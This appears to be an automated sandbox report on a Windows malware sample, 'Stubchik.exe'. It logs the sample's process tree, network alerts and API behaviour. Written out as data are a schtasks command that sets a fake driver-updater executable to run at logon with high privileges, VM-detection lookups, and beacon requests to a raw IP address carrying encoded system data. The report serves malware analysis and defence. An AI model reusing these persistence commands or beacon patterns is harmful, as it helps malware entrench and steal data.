Summary | ZeroBOX

Category	Machine	Started	Completed
FILE	s1_win7_x6401	Sept. 20, 2021, 9:32 a.m.	Sept. 20, 2021, 9:43 a.m.

Size	2.7MB
Type	PE32 executable (GUI) Intel 80386 (stripped to external PDB), for MS Windows
MD5	`d5d4f07e59ffad621f322b68c12e411e`
SHA256	`42506f9e15ffdab6fce67556b602075ff779e2e84c6a40058a3941f0f71071b2`
CRC32	`2CC41568`
ssdeep	`49152:8qgCWU4cUagFjTlMnE1mrswa9dKsxGzVCRRU30ZLozGEXwacq3QTPXq+2:8qgzjrDFP+VrvaJx0C03xi+rgDq`
Yara	PE_Header_Zero - PE File Signature IsPE32 - (no description)

Stubchik.exe "C:\Users\test22\AppData\Local\Temp\Stubchik.exe"
2232
- cmd.exe cmd /c start C:\Users\test22\AppData\Roaming\DriverRealtekHDmaster.exe
  1160
  - DriverRealtekHDmaster.exe C:\Users\test22\AppData\Roaming\DriverRealtekHDmaster.exe
    1768
    - cmd.exe "C:\Windows\System32\cmd.exe" /C "C:\Users\test22\AppData\Local\Temp\3euNESrjJS.bat"
      3052
      - chcp.com chcp 65001
        2140
      - w32tm.exe w32tm /stripchart /computer:localhost /period:5 /dataonly /samples:2
        2160
      - mobsync.exe "C:\Sandbox\test22\DefaultBox\drive\C\Windows\mobsync.exe"
        1048
- cmd.exe cmd /c start C:\Users\test22\AppData\Local\Temp\DriverMaster.exe
  2056
  - DriverMaster.exe C:\Users\test22\AppData\Local\Temp\DriverMaster.exe
    668
    - cmd.exe "C:\Windows\System32\cmd.exe" /c schtasks /create /f /sc onlogon /rl highest /tn "EngineDriverMaster" /tr '"C:\Users\test22\AppData\Local\Temp\EngineDriverMaster.exe"' & exit
      2948
      - schtasks.exe schtasks /create /f /sc onlogon /rl highest /tn "EngineDriverMaster" /tr '"C:\Users\test22\AppData\Local\Temp\EngineDriverMaster.exe"'
        2312
    - EngineDriverMaster.exe "C:\Users\test22\AppData\Local\Temp\EngineDriverMaster.exe"
      1108
      - cmd.exe "C:\Windows\System32\cmd.exe" /c schtasks /create /f /sc onlogon /rl highest /tn "EngineDriverMaster" /tr '"C:\Users\test22\AppData\Local\Temp\EngineDriverMaster.exe"' & exit
        1772
        
        schtasks.exe schtasks /create /f /sc onlogon /rl highest /tn "EngineDriverMaster" /tr '"C:\Users\test22\AppData\Local\Temp\EngineDriverMaster.exe"'
        2420
      - sihost32.exe "C:\Users\test22\AppData\Roaming\Microsoft\Telemetry\sihost32.exe"
        1916

Name	Response	Post-Analysis Lookup
ipinfo.io	A 34.117.59.81	34.117.59.81
ip-api.com	A 208.95.112.1	208.95.112.1

IP Address	Status	Action
164.124.101.2	Active	Moloch
208.95.112.1	Active	Moloch
34.117.59.81	Active	Moloch
62.109.1.30	Active	Moloch

Suricata Alerts

Flow	SID	Signature	Category
TCP 192.168.56.101:49219 -> 208.95.112.1:80	2022082	ET POLICY External IP Lookup ip-api.com	Device Retrieving External IP Address Detected
TCP 192.168.56.101:49220 -> 34.117.59.81:443	2025331	ET POLICY Possible External IP Lookup Domain Observed in SNI (ipinfo. io)	Device Retrieving External IP Address Detected
TCP 192.168.56.101:49220 -> 34.117.59.81:443	906200056	SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee)	undefined
TCP 34.117.59.81:443 -> 192.168.56.101:49220	2025330	ET POLICY Possible External IP Lookup SSL Cert Observed (ipinfo.io)	Device Retrieving External IP Address Detected

Suricata TLS

Flow	Issuer	Subject	Fingerprint
TLSv1 192.168.56.101:49220 34.117.59.81:443	C=US, O=Google Trust Services LLC, CN=GTS CA 1D4	CN=ipinfo.io	9b:8a:7e:73:93:70:47:e8:1f:ef:b1:b9:f4:52:8b:2f:90:2c:85:2e

Queries for the computername (29 events)

Time & API	Arguments	Status	Return
GetComputerNameW Sept. 20, 2021, 9:25 a.m.	computer_name: TEST22-PC	1	1
GetComputerNameW Sept. 20, 2021, 9:25 a.m.	computer_name: TEST22-PC	1	1
GetComputerNameW Sept. 20, 2021, 9:25 a.m.	computer_name: TEST22-PC	1	1
GetComputerNameW Sept. 20, 2021, 9:25 a.m.	computer_name: TEST22-PC	1	1
GetComputerNameW Sept. 20, 2021, 9:25 a.m.	computer_name: TEST22-PC	1	1
GetComputerNameW Sept. 20, 2021, 9:25 a.m.	computer_name: TEST22-PC	1	1
GetComputerNameW Sept. 20, 2021, 9:25 a.m.	computer_name: TEST22-PC	1	1
GetComputerNameW Sept. 20, 2021, 9:25 a.m.	computer_name: TEST22-PC	1	1
GetComputerNameW Sept. 20, 2021, 9:25 a.m.	computer_name: TEST22-PC	1	1
GetComputerNameW Sept. 20, 2021, 9:25 a.m.	computer_name: TEST22-PC	1	1
GetComputerNameW Sept. 20, 2021, 9:25 a.m.	computer_name: TEST22-PC	1	1
GetComputerNameW Sept. 20, 2021, 9:25 a.m.	computer_name: TEST22-PC	1	1
GetComputerNameW Sept. 20, 2021, 9:25 a.m.	computer_name: TEST22-PC	1	1
GetComputerNameW Sept. 20, 2021, 9:25 a.m.	computer_name: TEST22-PC	1	1
GetComputerNameW Sept. 20, 2021, 9:33 a.m.	computer_name: TEST22-PC	1	1
GetComputerNameW Sept. 20, 2021, 9:34 a.m.	computer_name: TEST22-PC	1	1
GetComputerNameW Sept. 20, 2021, 9:33 a.m.	computer_name: TEST22-PC	1	1
GetComputerNameW Sept. 20, 2021, 9:33 a.m.	computer_name: TEST22-PC	1	1
GetComputerNameW Sept. 20, 2021, 9:33 a.m.	computer_name: TEST22-PC	1	1
GetComputerNameW Sept. 20, 2021, 9:33 a.m.	computer_name: TEST22-PC	1	1
GetComputerNameW Sept. 20, 2021, 9:33 a.m.	computer_name: TEST22-PC	1	1
GetComputerNameW Sept. 20, 2021, 9:33 a.m.	computer_name: TEST22-PC	1	1
GetComputerNameW Sept. 20, 2021, 9:33 a.m.	computer_name: TEST22-PC	1	1
GetComputerNameW Sept. 20, 2021, 9:33 a.m.	computer_name: TEST22-PC	1	1
GetComputerNameW Sept. 20, 2021, 9:33 a.m.	computer_name: TEST22-PC	1	1
GetComputerNameW Sept. 20, 2021, 9:33 a.m.	computer_name: TEST22-PC	1	1
GetComputerNameW Sept. 20, 2021, 9:33 a.m.	computer_name: TEST22-PC	1	1
GetComputerNameW Sept. 20, 2021, 9:33 a.m.	computer_name: TEST22-PC	1	1
GetComputerNameW Sept. 20, 2021, 9:34 a.m.	computer_name: TEST22-PC	1	1

Checks if process is being debugged by a debugger (10 events)

Time & API	Arguments	Status	Return	Repeated
IsDebuggerPresent Sept. 20, 2021, 9:24 a.m.			0	0
IsDebuggerPresent Sept. 20, 2021, 9:24 a.m.			0	0
IsDebuggerPresent Sept. 20, 2021, 9:24 a.m.			0	0
IsDebuggerPresent Sept. 20, 2021, 9:24 a.m.			0	0
IsDebuggerPresent Sept. 20, 2021, 9:32 a.m.			0	0
IsDebuggerPresent Sept. 20, 2021, 9:32 a.m.			0	0
IsDebuggerPresent Sept. 20, 2021, 9:32 a.m.			0	0
IsDebuggerPresent Sept. 20, 2021, 9:32 a.m.			0	0
IsDebuggerPresent Sept. 20, 2021, 9:33 a.m.			0	0
IsDebuggerPresent Sept. 20, 2021, 9:33 a.m.			0	0

Command line console output was observed (4 events)

Time & API	Arguments	Status	Return
WriteConsoleW Sept. 20, 2021, 9:25 a.m.	buffer: SUCCESS: The scheduled task "EngineDriverMaster" has successfully been created. console_handle: 0x0000000000000007	1	1
WriteConsoleW Sept. 20, 2021, 9:32 a.m.	buffer: The batch file cannot be found. console_handle: 0x000000000000000b	1	1
WriteConsoleW Sept. 20, 2021, 9:32 a.m.	buffer: Active code page: 65001 console_handle: 0x0000000000000013	1	1
WriteConsoleW Sept. 20, 2021, 9:33 a.m.	buffer: SUCCESS: The scheduled task "EngineDriverMaster" has successfully been created. console_handle: 0x0000000000000007	1	1

Collects information to fingerprint the system (MachineGuid, DigitalProductId, SystemBiosDate) (1 event)

registry

HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography\MachineGuid

Checks amount of memory in system, this can be used to detect virtual machines that have a low amount of memory available (1 event)

Time & API	Arguments	Status	Return	Repeated
GlobalMemoryStatusEx Sept. 20, 2021, 9:24 a.m.		1	1	0

One or more processes crashed (1 event)

Time & API	Arguments	Status	Return	Repeated
__exception__ Sept. 20, 2021, 9:34 a.m.	stacktrace: 0x7fe91c24d18 0x7fe91cc06a9 0x7fe91bf484d mscorlib+0x4ef8a5 @ 0x7feeebef8a5 mscorlib+0x4ef609 @ 0x7feeebef609 mscorlib+0x4ef5c7 @ 0x7feeebef5c7 mscorlib+0x502d21 @ 0x7feeec02d21 CoUninitializeEE+0x4c56f GetMetaDataInternalInterface-0x2b1ad clr+0x4f713 @ 0x7fef124f713 CoUninitializeEE+0x4c09e GetMetaDataInternalInterface-0x2b67e clr+0x4f242 @ 0x7fef124f242 CoUninitializeEE+0x4c167 GetMetaDataInternalInterface-0x2b5b5 clr+0x4f30b @ 0x7fef124f30b NGenCreateNGenWorker+0x682d _AxlPublicKeyBlobToPublicKeyToken-0x409df clr+0x216291 @ 0x7fef1416291 DestroyAssemblyConfigCookie+0x157fc PreBindAssembly-0xc054 clr+0xf6d80 @ 0x7fef12f6d80 DestroyAssemblyConfigCookie+0x1578a PreBindAssembly-0xc0c6 clr+0xf6d0e @ 0x7fef12f6d0e DestroyAssemblyConfigCookie+0x15701 PreBindAssembly-0xc14f clr+0xf6c85 @ 0x7fef12f6c85 DestroyAssemblyConfigCookie+0x15837 PreBindAssembly-0xc019 clr+0xf6dbb @ 0x7fef12f6dbb NGenCreateNGenWorker+0x6711 _AxlPublicKeyBlobToPublicKeyToken-0x40afb clr+0x216175 @ 0x7fef1416175 StrongNameSignatureVerification+0x5a22 GetCLRFunction-0x7712 clr+0x1866ae @ 0x7fef13866ae BaseThreadInitThunk+0xd CreateThread-0x53 kernel32+0x1652d @ 0x76e5652d RtlUserThreadStart+0x21 strchr-0x3df ntdll+0x2c521 @ 0x771ec521 exception.instruction_r: 80 38 00 48 8b 4c 24 40 48 8b 54 24 48 48 8d 05 exception.instruction: cmp byte ptr [rax], 0 exception.exception_code: 0xc0000005 exception.symbol: exception.address: 0x7fe91c24d18 registers.r14: 0 registers.r15: 0 registers.rcx: 0 registers.rsi: 0 registers.r10: 8789948791352 registers.rbx: 0 registers.rsp: 492044096 registers.r11: 492037904 registers.r8: 44668912 registers.r9: 8791510182032 registers.rdx: 44668912 registers.r12: 0 registers.rbp: 0 registers.rdi: 0 registers.rax: 0 registers.r13: 0	1	0	0

Time & API

Arguments

Status

Return

Repeated

__exception__

Sept. 20, 2021, 9:34 a.m.

stacktrace:

0x7fe91c24d18
0x7fe91cc06a9
0x7fe91bf484d
mscorlib+0x4ef8a5 @ 0x7feeebef8a5
mscorlib+0x4ef609 @ 0x7feeebef609
mscorlib+0x4ef5c7 @ 0x7feeebef5c7
mscorlib+0x502d21 @ 0x7feeec02d21
CoUninitializeEE+0x4c56f GetMetaDataInternalInterface-0x2b1ad clr+0x4f713 @ 0x7fef124f713
CoUninitializeEE+0x4c09e GetMetaDataInternalInterface-0x2b67e clr+0x4f242 @ 0x7fef124f242
CoUninitializeEE+0x4c167 GetMetaDataInternalInterface-0x2b5b5 clr+0x4f30b @ 0x7fef124f30b
NGenCreateNGenWorker+0x682d _AxlPublicKeyBlobToPublicKeyToken-0x409df clr+0x216291 @ 0x7fef1416291
DestroyAssemblyConfigCookie+0x157fc PreBindAssembly-0xc054 clr+0xf6d80 @ 0x7fef12f6d80
DestroyAssemblyConfigCookie+0x1578a PreBindAssembly-0xc0c6 clr+0xf6d0e @ 0x7fef12f6d0e
DestroyAssemblyConfigCookie+0x15701 PreBindAssembly-0xc14f clr+0xf6c85 @ 0x7fef12f6c85
DestroyAssemblyConfigCookie+0x15837 PreBindAssembly-0xc019 clr+0xf6dbb @ 0x7fef12f6dbb
NGenCreateNGenWorker+0x6711 _AxlPublicKeyBlobToPublicKeyToken-0x40afb clr+0x216175 @ 0x7fef1416175
StrongNameSignatureVerification+0x5a22 GetCLRFunction-0x7712 clr+0x1866ae @ 0x7fef13866ae
BaseThreadInitThunk+0xd CreateThread-0x53 kernel32+0x1652d @ 0x76e5652d
RtlUserThreadStart+0x21 strchr-0x3df ntdll+0x2c521 @ 0x771ec521

exception.instruction_r: 80 38 00 48 8b 4c 24 40 48 8b 54 24 48 48 8d 05
exception.instruction: cmp byte ptr [rax], 0
exception.exception_code: 0xc0000005
exception.symbol:
exception.address: 0x7fe91c24d18
registers.r14: 0
registers.r15: 0
registers.rcx: 0
registers.rsi: 0
registers.r10: 8789948791352
registers.rbx: 0
registers.rsp: 492044096
registers.r11: 492037904
registers.r8: 44668912
registers.r9: 8791510182032
registers.rdx: 44668912
registers.r12: 0
registers.rbp: 0
registers.rdi: 0
registers.rax: 0
registers.r13: 0

One or more potentially interesting buffers were extracted, these generally contain injected code, configuration data, etc.

HTTP traffic contains suspicious features which may be indicative of malware related traffic (3 events)

suspicious_features	Connection to IP address	suspicious_request	GET http://62.109.1.30/triggers/vm_.php?nNdbNrr8z79RMLf1fFId=YoCVXIkRnMUFyTxLHSg92At0Ro6v&3sBRuPjaFzjG=LvpLY2sqXwle9X4LEtLz6t&SyDEOuCd72Kz8LFP=Dog6&e8f6de43394a8e2ef93b201a0d2ec922=c0280c4c3f572aabfa038560a3f515da&65ab24948c084368808c084126a043f5=QNkZTNzcDOwMWM5QGM4YzMyQmY2MGZmV2MmdDOjN2MiF2M5gDM2MGO&nNdbNrr8z79RMLf1fFId=YoCVXIkRnMUFyTxLHSg92At0Ro6v&3sBRuPjaFzjG=LvpLY2sqXwle9X4LEtLz6t&SyDEOuCd72Kz8LFP=Dog6
suspicious_features	GET method with no useragent header	suspicious_request	GET http://ip-api.com/line/?fields=hosting
suspicious_features	Connection to IP address	suspicious_request	GET http://62.109.1.30/triggers/vm_.php?nNdbNrr8z79RMLf1fFId=YoCVXIkRnMUFyTxLHSg92At0Ro6v&3sBRuPjaFzjG=LvpLY2sqXwle9X4LEtLz6t&SyDEOuCd72Kz8LFP=Dog6&02a02393cf420479d23438ff09302b99=jNDZkFTN2EWO4ITZiFGZ0UWYlVGZyM2NmVGM4MzNzU2Y4QjNmhDNjBDMyEjM1ETNyQTOxUTM&65ab24948c084368808c084126a043f5=wMmhDNzQjYmZTYiRzNxMTOjVWY0I2NhZWN0MTO5MGNxgjMxgjY0EmY&0c2329b9f0dc4c64441b4dcf29994306=d1nIhRDM1cjNwYmYlJzYmV2MjVmYlVjNjZ2M5cTM4YTO0QDOxgDNyI2NkJiOigDN5kTNxYTM2EzM0YTNjVmMiR2MjN2YygDO3M2MhNWYiwiI0cTM2M2Y4EDM2YTZ5IzNmZTNiRWM5ETM4YGO4IjY0YDM0czMjJWM0IiOiYGNlBjNkJGOwkDZjhjZjVjNiVDO3kzM5ETYmBjMkRGOis3W&fc24c3366cf2f1612650240a4476fd9c=d1nIiojIhJGOmJWNjZmYxUTYxYGNiVTMiZGMzUWN5MDN4cTMyUjIsISY0ATN3YDMmJWZyMmZlNzYlJWZ1YzYmNTO3EDO2kDN0gTM4QjMidDZiojI4QTO5UTM2EjNxMDN2UzYlJjYkNzYjNmM4gzNjNTYjFmIsICN3EjNjNGOxAjN2UWOycjZ2UjYkFTOxEDOmhDOyIGN2ADN3MzYiFDNiojImRTZwYDZihDM5Q2Y4Y2Y1YjY1gzN5MTOxEmZwIDZkhjI7xSfikTMulkexcUSzsmaJZTSD9ENVpWWtpEROpXSykFbGpnTp5kaNtmUt5EaOdkW4lFVatGZUp1aa1WWqpFVad3YqpFMJdkWpNnbPlWRHRGaSVEZ0YVbJNXSpNGbkdVW1Z0VUdGMXlVekJjY5JEbJZTS5RmdS1mYwRmRWRkRrl0cJN1Vp9maJVHbXJ2aGBzYwp0QMlGNrlkNJNlYo5UbZxGZxMGcKNETptGbJZTSTpVd5cUY3lTbjpGbXRles1WSzl0UihmVHZldKhEZqZ1RiZkSp9UajVVUVp0QMlWUYF2QCNkTyEUaUxkQDJGa1IjYw50MjxmWyIWeCZUSzEUejNTOHpVdsJjVp9maJlnVtZVdsJjVpd3Uml2ZHRWMGJjW1xmMjpHbXJmd4cVY1hTbaVHbHNGc5kHT20ESjBjUIFWavpWSsFzRahmVtNWa3lWSzZ1MixmTxwEasJzYCpUaPlWVtJmdwhlW0x2Rkl2dplkMnRVT6FkaJZTSDJGaSNzY2JkbJNXSTJmdOdlWzZ1RWdWRXpVe5IzUnllaONTU6VlQKl2TpNWbjZnSDxUaRR0TzsmaMJTSU10cBpmTyUlaMNTTqlkNJlXW2hXbJNXSpVFTKl2TptmbjBTNXRmdO1WSzl0QiFTOXpFVKl2TpRjMiBHZXpVeKNETpd3VkZnVyUVavpWS1IFWhpmSDxUaBRlT4RzQOpXRqxENBpWT1VleOhXSp9UaBhVYpNnbPlGOtpVdsV0YKp0QMlWSq1EMOhlWwoUaPlWVXJGa1s2Ys5EWWl2dplERCZFT5lERWRlVFZVavpWSsFzVZ9kTFVVa3lWSzQzQOVXUqlkNJl2YspFbjxmWuNGbOxWSzlUallEZF1EN0kWTnFURJZlQxE1ZBRUTwcGVMFzaHlEcwUkVvVVbjZnTFlEcJZ0SzZ1RkVHbrlkNJNlW0ZUbUZlQxEVa3lWSDJ0QNdGMDl0dTl1NSlHN2ATYKdzZwwEb0pGcuJna3QXcENVUIplRJF0ULdzYHp1Np9maJxWMXl1TWZUVIp0QMlWT5FVavpWSsJEWlVlSYplMKhlWUpUelJiOiEmY4YmY1MmZiFTNhFjZ0IWNxImZwMTZ1kzM0gzNxITNiwiIkRmYxUzN0kDZhRWZlRzY2UWMyEWZ2IjMmJTYyYGMhJTM1gTOhNmNjJiOigDN5kTNxYTM2EzM0YTNjVmMiR2MjN2YygDO3M2MhNWYiwiI0cTM2M2Y4EDM2YTZ5IzNmZTNiRWM5ETM4YGO4IjY0YDM0czMjJWM0IiOiYGNlBjNkJGOwkDZjhjZjVjNiVDO3kzM5ETYmBjMkRGOis3W

Performs some HTTP requests (4 events)

request	GET http://62.109.1.30/triggers/vm_.php?nNdbNrr8z79RMLf1fFId=YoCVXIkRnMUFyTxLHSg92At0Ro6v&3sBRuPjaFzjG=LvpLY2sqXwle9X4LEtLz6t&SyDEOuCd72Kz8LFP=Dog6&e8f6de43394a8e2ef93b201a0d2ec922=c0280c4c3f572aabfa038560a3f515da&65ab24948c084368808c084126a043f5=QNkZTNzcDOwMWM5QGM4YzMyQmY2MGZmV2MmdDOjN2MiF2M5gDM2MGO&nNdbNrr8z79RMLf1fFId=YoCVXIkRnMUFyTxLHSg92At0Ro6v&3sBRuPjaFzjG=LvpLY2sqXwle9X4LEtLz6t&SyDEOuCd72Kz8LFP=Dog6
request	GET http://ip-api.com/line/?fields=hosting
request	GET http://62.109.1.30/triggers/vm_.php?nNdbNrr8z79RMLf1fFId=YoCVXIkRnMUFyTxLHSg92At0Ro6v&3sBRuPjaFzjG=LvpLY2sqXwle9X4LEtLz6t&SyDEOuCd72Kz8LFP=Dog6&02a02393cf420479d23438ff09302b99=jNDZkFTN2EWO4ITZiFGZ0UWYlVGZyM2NmVGM4MzNzU2Y4QjNmhDNjBDMyEjM1ETNyQTOxUTM&65ab24948c084368808c084126a043f5=wMmhDNzQjYmZTYiRzNxMTOjVWY0I2NhZWN0MTO5MGNxgjMxgjY0EmY&0c2329b9f0dc4c64441b4dcf29994306=d1nIhRDM1cjNwYmYlJzYmV2MjVmYlVjNjZ2M5cTM4YTO0QDOxgDNyI2NkJiOigDN5kTNxYTM2EzM0YTNjVmMiR2MjN2YygDO3M2MhNWYiwiI0cTM2M2Y4EDM2YTZ5IzNmZTNiRWM5ETM4YGO4IjY0YDM0czMjJWM0IiOiYGNlBjNkJGOwkDZjhjZjVjNiVDO3kzM5ETYmBjMkRGOis3W&fc24c3366cf2f1612650240a4476fd9c=d1nIiojIhJGOmJWNjZmYxUTYxYGNiVTMiZGMzUWN5MDN4cTMyUjIsISY0ATN3YDMmJWZyMmZlNzYlJWZ1YzYmNTO3EDO2kDN0gTM4QjMidDZiojI4QTO5UTM2EjNxMDN2UzYlJjYkNzYjNmM4gzNjNTYjFmIsICN3EjNjNGOxAjN2UWOycjZ2UjYkFTOxEDOmhDOyIGN2ADN3MzYiFDNiojImRTZwYDZihDM5Q2Y4Y2Y1YjY1gzN5MTOxEmZwIDZkhjI7xSfikTMulkexcUSzsmaJZTSD9ENVpWWtpEROpXSykFbGpnTp5kaNtmUt5EaOdkW4lFVatGZUp1aa1WWqpFVad3YqpFMJdkWpNnbPlWRHRGaSVEZ0YVbJNXSpNGbkdVW1Z0VUdGMXlVekJjY5JEbJZTS5RmdS1mYwRmRWRkRrl0cJN1Vp9maJVHbXJ2aGBzYwp0QMlGNrlkNJNlYo5UbZxGZxMGcKNETptGbJZTSTpVd5cUY3lTbjpGbXRles1WSzl0UihmVHZldKhEZqZ1RiZkSp9UajVVUVp0QMlWUYF2QCNkTyEUaUxkQDJGa1IjYw50MjxmWyIWeCZUSzEUejNTOHpVdsJjVp9maJlnVtZVdsJjVpd3Uml2ZHRWMGJjW1xmMjpHbXJmd4cVY1hTbaVHbHNGc5kHT20ESjBjUIFWavpWSsFzRahmVtNWa3lWSzZ1MixmTxwEasJzYCpUaPlWVtJmdwhlW0x2Rkl2dplkMnRVT6FkaJZTSDJGaSNzY2JkbJNXSTJmdOdlWzZ1RWdWRXpVe5IzUnllaONTU6VlQKl2TpNWbjZnSDxUaRR0TzsmaMJTSU10cBpmTyUlaMNTTqlkNJlXW2hXbJNXSpVFTKl2TptmbjBTNXRmdO1WSzl0QiFTOXpFVKl2TpRjMiBHZXpVeKNETpd3VkZnVyUVavpWS1IFWhpmSDxUaBRlT4RzQOpXRqxENBpWT1VleOhXSp9UaBhVYpNnbPlGOtpVdsV0YKp0QMlWSq1EMOhlWwoUaPlWVXJGa1s2Ys5EWWl2dplERCZFT5lERWRlVFZVavpWSsFzVZ9kTFVVa3lWSzQzQOVXUqlkNJl2YspFbjxmWuNGbOxWSzlUallEZF1EN0kWTnFURJZlQxE1ZBRUTwcGVMFzaHlEcwUkVvVVbjZnTFlEcJZ0SzZ1RkVHbrlkNJNlW0ZUbUZlQxEVa3lWSDJ0QNdGMDl0dTl1NSlHN2ATYKdzZwwEb0pGcuJna3QXcENVUIplRJF0ULdzYHp1Np9maJxWMXl1TWZUVIp0QMlWT5FVavpWSsJEWlVlSYplMKhlWUpUelJiOiEmY4YmY1MmZiFTNhFjZ0IWNxImZwMTZ1kzM0gzNxITNiwiIkRmYxUzN0kDZhRWZlRzY2UWMyEWZ2IjMmJTYyYGMhJTM1gTOhNmNjJiOigDN5kTNxYTM2EzM0YTNjVmMiR2MjN2YygDO3M2MhNWYiwiI0cTM2M2Y4EDM2YTZ5IzNmZTNiRWM5ETM4YGO4IjY0YDM0czMjJWM0IiOiYGNlBjNkJGOwkDZjhjZjVjNiVDO3kzM5ETYmBjMkRGOis3W
request	GET https://ipinfo.io/json

Allocates read-write-execute memory (usually to unpack itself) (50 out of 393 events)

Time & API	Arguments	Status
NtAllocateVirtualMemory Sept. 20, 2021, 9:24 a.m.	process_identifier: 1768 region_size: 720896 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x0000000000530000 allocation_type: 8192 (MEM_RESERVE) process_handle: 0xffffffffffffffff	1
NtAllocateVirtualMemory Sept. 20, 2021, 9:24 a.m.	process_identifier: 1768 region_size: 8192 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x0000000000560000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffffffffffff	1
NtProtectVirtualMemory Sept. 20, 2021, 9:24 a.m.	process_identifier: 1768 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x000007fef1201000 process_handle: 0xffffffffffffffff	1
NtProtectVirtualMemory Sept. 20, 2021, 9:24 a.m.	process_identifier: 1768 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x000007fef189b000 process_handle: 0xffffffffffffffff	1
NtAllocateVirtualMemory Sept. 20, 2021, 9:24 a.m.	process_identifier: 1768 region_size: 1310720 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x0000000002060000 allocation_type: 8192 (MEM_RESERVE) process_handle: 0xffffffffffffffff	1
NtAllocateVirtualMemory Sept. 20, 2021, 9:24 a.m.	process_identifier: 1768 region_size: 8192 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x0000000002120000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffffffffffff	1
NtProtectVirtualMemory Sept. 20, 2021, 9:24 a.m.	process_identifier: 1768 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x000007fef1202000 process_handle: 0xffffffffffffffff	1
NtProtectVirtualMemory Sept. 20, 2021, 9:24 a.m.	process_identifier: 1768 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x000007fef1202000 process_handle: 0xffffffffffffffff	1
NtProtectVirtualMemory Sept. 20, 2021, 9:24 a.m.	process_identifier: 1768 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x000007fef1202000 process_handle: 0xffffffffffffffff	1
NtProtectVirtualMemory Sept. 20, 2021, 9:24 a.m.	process_identifier: 1768 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x000007fef1202000 process_handle: 0xffffffffffffffff	1
NtProtectVirtualMemory Sept. 20, 2021, 9:24 a.m.	process_identifier: 1768 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x000007fef1202000 process_handle: 0xffffffffffffffff	1
NtProtectVirtualMemory Sept. 20, 2021, 9:24 a.m.	process_identifier: 1768 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x000007fef1202000 process_handle: 0xffffffffffffffff	1
NtProtectVirtualMemory Sept. 20, 2021, 9:24 a.m.	process_identifier: 1768 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x000007fef1202000 process_handle: 0xffffffffffffffff	1
NtProtectVirtualMemory Sept. 20, 2021, 9:24 a.m.	process_identifier: 1768 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x000007fef1202000 process_handle: 0xffffffffffffffff	1
NtProtectVirtualMemory Sept. 20, 2021, 9:24 a.m.	process_identifier: 1768 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x000007fef1202000 process_handle: 0xffffffffffffffff	1
NtProtectVirtualMemory Sept. 20, 2021, 9:24 a.m.	process_identifier: 1768 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x000007fef1202000 process_handle: 0xffffffffffffffff	1
NtProtectVirtualMemory Sept. 20, 2021, 9:24 a.m.	process_identifier: 1768 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x000007fef1202000 process_handle: 0xffffffffffffffff	1
NtProtectVirtualMemory Sept. 20, 2021, 9:24 a.m.	process_identifier: 1768 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x000007fef1204000 process_handle: 0xffffffffffffffff	1
NtProtectVirtualMemory Sept. 20, 2021, 9:24 a.m.	process_identifier: 1768 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x000007fef1204000 process_handle: 0xffffffffffffffff	1
NtProtectVirtualMemory Sept. 20, 2021, 9:24 a.m.	process_identifier: 1768 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x000007fef1204000 process_handle: 0xffffffffffffffff	1
NtProtectVirtualMemory Sept. 20, 2021, 9:24 a.m.	process_identifier: 1768 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x000007fef1204000 process_handle: 0xffffffffffffffff	1
NtAllocateVirtualMemory Sept. 20, 2021, 9:24 a.m.	process_identifier: 1768 region_size: 655360 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x000007fffff10000 allocation_type: 1056768 (MEM_RESERVE\|MEM_TOP_DOWN) process_handle: 0xffffffffffffffff	1
